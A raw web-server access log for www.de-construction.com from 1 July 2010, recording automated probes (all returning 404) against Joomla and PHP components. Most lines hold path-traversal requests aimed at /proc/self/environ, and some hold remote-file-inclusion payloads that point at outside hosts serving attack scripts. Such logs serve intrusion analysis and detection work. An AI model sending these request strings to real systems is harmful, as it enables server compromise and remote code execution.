216.131.96.193 - - [01/Jul/2010:13:36:38 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:38 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:41 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:41 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:41 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:42 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:42 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:42 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:42 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:42 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:42 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:55 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:55 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:55 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:56 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:56 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:36:56 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:37:15 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:37:15 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:37:15 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:38:07 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:38:07 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:38:07 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.73.155.53 - - [01/Jul/2010:13:38:19 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
69.73.155.53 - - [01/Jul/2010:13:38:20 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:38:33 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:38:34 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:38:35 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:39:34 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:13:43:20 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:47:48 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:47:48 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:47:48 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:48:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:48:09 -0700] "GET /appserv/main.php?appserv_root=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:48:09 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:50:18 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:50:19 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:50:19 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:13:53:06 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:54:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:54:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:54:49 -0700] "GET /logs/access_100601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:57:38 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:13:58:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:13:58:59 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:13:59:51 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:13:59:52 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:00:01 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:00:46 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:00:54 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:00:55 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:02:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:02:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:02:19 -0700] "GET /logs/access_100601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:02:41 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:02:47 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:02:52 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:03:20 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:03:20 -0700] "GET /logs/access_100601.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:03:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:03:21 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:03:27 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:14:05:34 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:14:05:34 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:14:05:35 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:07:42 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:07:46 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:07:51 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:09:33 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:09:35 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:09:39 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:09:43 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:09:44 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:10:22 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:14:11:33 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:14:11:33 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
92.241.190.214 - - [01/Jul/2010:14:11:34 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:38 -0700] "GET /components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:38 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:38 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:53 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:53 -0700] "GET /components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:53 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:57 -0700] "GET /components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:57 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
125.141.91.138 - - [01/Jul/2010:14:11:57 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:23:23 -0700] "GET /logs/access_100601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:14:23:33 -0700] "GET /logs/access_100601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.163.243.76 - - [01/Jul/2010:14:26:02 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.163.243.76 - - [01/Jul/2010:14:26:02 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.163.243.76 - - [01/Jul/2010:14:26:02 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:27:32 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:27:32 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:27:32 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:33:30 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:37:25 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:37:27 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:37:31 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:37:32 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:37:33 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:40:03 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:40:04 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:40:06 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:45:41 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:45:43 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:58:04 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:58:05 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:14:58:05 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:59:28 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:14:59:32 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:03:38 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:15:03:38 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:10:05 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
148.233.85.135 - - [01/Jul/2010:15:10:06 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
